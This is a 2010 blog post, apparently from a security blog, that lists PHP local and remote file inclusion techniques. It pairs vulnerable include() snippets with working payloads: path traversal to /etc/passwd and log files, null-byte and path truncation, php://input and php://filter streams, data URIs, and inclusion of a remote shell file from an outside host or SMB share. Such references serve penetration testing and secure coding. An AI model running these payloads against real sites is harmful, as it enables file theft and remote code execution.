Exploiting PHP File Inclusion – Overview

February 22, 2010

Recently I see a lot of questions regarding PHP File Inclusions and the possibilities you have. So I decided to give a small overview. All the tricks have been described in detail somewhere earlier, but I like it to have them summed up at one place.

Basic Local File Inclusion:

<?php include("includes/" . $_GET['file']); ?>
  • Including files in the same directory:
    ?file=.htaccess
  • Path Traversal:
    ?file=../../../../../../../../../var/lib/locate.db
    (this file is very interesting because it lets you search the filesystem, other files)
  • Including injected PHP code:
    ?file=../../../../../../../../../var/log/apache/error.log
    (you can find other possible Apache dirs here and other ways here. Think about all possible logfiles, including ssh auth.log, file uploads, session files etc.). Temporarily uploaded files might work too. If you additionally have a phpinfo() output, read here.

Limited Local File Inclusion:

<?php include("includes/" . $_GET['file'] . ".htm"); ?>
  • Null Byte Injection:
    ?file=../../../../../../../../../etc/passwd%00
    (requires magic_quotes_gpc=off)
  • Directory Listing with Null Byte Injection:
    ?file=../../../../../../../../../var/www/accounts/%00
    (UFS filesystem only, requires magic_quotes_gpc=off, more details here)
  • Path Truncation:
    ?file=../../../../../../../../../etc/passwd.\.\.\.\.\.\.\.\.\.\.\ ...
    (more details see here and here)
  • Dot Truncation:
    ?file=../../../../../../../../../etc/passwd................ ...
    (Windows only, more details here)
  • Reverse Path Truncation:
    ?file=../../../../ [...] ../../../../../etc/passwd
    (more details here)

Basic Remote File Inclusion

<?php include($_GET['file']); ?>
  • Including Remote Code:
    ?file=[http|https|ftp]://websec.wordpress.com/shell.txt
    (requires allow_url_fopen=On and allow_url_include=On)
  • Using PHP stream php://input:
    ?file=php://input
    (specify your payload in the POST parameters, watch urlencoding, details here, requires allow_url_include=On)
  • Using PHP stream php://filter:
    ?file=php://filter/convert.base64-encode/resource=index.php
    (lets you read PHP source because it wont get evaluated in base64. More details here and here)

  • Using data URIs:
    ?file=data://text/plain;base64,SSBsb3ZlIFBIUAo=
    (requires allow_url_include=On)
  • Using XSS:
    ?file=http://127.0.0.1/path/xss.php?xss=phpcode
    (makes sense if firewalled or only whitelisted domains allowed)

Limited Remote File Inclusion

<?php include($_GET['file'] . ".htm"); ?>
  • ?file=http://websec.wordpress.com/shell
  • ?file=http://websec.wordpress.com/shell.txt?
  • ?file=http://websec.wordpress.com/shell.txt%23
  • (requires allow_url_fopen=On and allow_url_include=On)

  • ?file=\\evilshare\shell.php
  • (bypasses allow_url_fopen=Off)

Static Remote File Inclusion:

<?php include("http://192.168.1.10/config.php"); ?>
  • Man In The Middle
    (lame indeed, but often forgotten)

Filter evasion

  • Access files with wildcards (read more here)

Of course you can combine all the tricks. If you are aware of any other or interesting files to include please leave a comment and I'll add them.


Follow

Get every new post delivered to your Inbox.

Join 77 other followers